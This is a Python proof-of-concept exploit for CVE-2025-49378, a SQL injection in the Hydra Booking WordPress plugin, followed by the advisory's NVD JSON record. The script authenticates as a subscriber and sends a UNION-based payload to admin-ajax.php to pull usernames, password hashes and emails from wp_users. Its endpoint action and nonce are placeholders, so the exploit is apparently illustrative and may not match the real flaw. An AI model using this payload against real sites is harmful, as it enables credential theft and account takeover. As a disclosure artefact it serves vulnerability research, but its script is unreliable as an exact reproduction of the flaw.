CVE-2025-49378

# CVE-2025-49378 - Hydra Booking SQL Injection PoC # Vulnerability: SQL Injection in Themefic Hydra Booking <= 1.1.10 # Researcher: [email protected] # CVSS: 8.5 (HIGH) import requests import sys # Target configuration TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" # Low-privilege WordPress account PASSWORD = "user_password" def exploit_sql_injection(target_url, cookies): """ Exploit SQL injection in Hydra Booking plugin. The vulnerable endpoint accepts unsanitized input that is directly concatenated into SQL queries. """ # Inject payload to extract admin password hash via UNION-based SQLi # Example payload: extract wp_users table data sql_payload = "1 UNION SELECT user_login, user_pass, user_email FROM wp_users-- -" # Endpoint vulnerable to SQL injection (example) vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Data payload with injection data = { "action": "hydra_booking_action", "booking_id": sql_payload, # Vulnerable parameter "nonce": "valid_nonce_here" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } response = requests.post( vulnerable_endpoint, data=data, cookies=cookies, headers=headers ) if response.status_code == 200: print(f"[+] Response received: {response.text[:500]}") # Parse response for extracted data if "admin" in response.text or "$P$" in response.text: print("[+] SQL Injection successful! User credentials extracted.") return response.text else: print(f"[-] Request failed with status code: {response.status_code}") return None def login_and_get_cookies(target_url, username, password): """Authenticate to WordPress and obtain session cookies.""" session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{target_url}/wp-admin/", "testcookie": "1" } response = session.post(login_url, data=login_data) if "wordpress_logged_in" in str(session.cookies): print("[+] Successfully authenticated") return session.cookies return None if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") cookies = login_and_get_cookies(TARGET_URL, USERNAME, PASSWORD) if cookies: result = exploit_sql_injection(TARGET_URL, cookies) if result: print(f"[+] Exploit completed. Extracted data: {result}") else: print("[-] Authentication failed. A valid low-privilege account is required.")

{"cve": {"id": "CVE-2025-49378", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:35.840", "lastModified": "2026-04-27T20:16:14.503", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Hydra Booking hydra-booking allows SQL Injection.This issue affects Hydra Booking: from n/a through <= 1.1.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-10-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}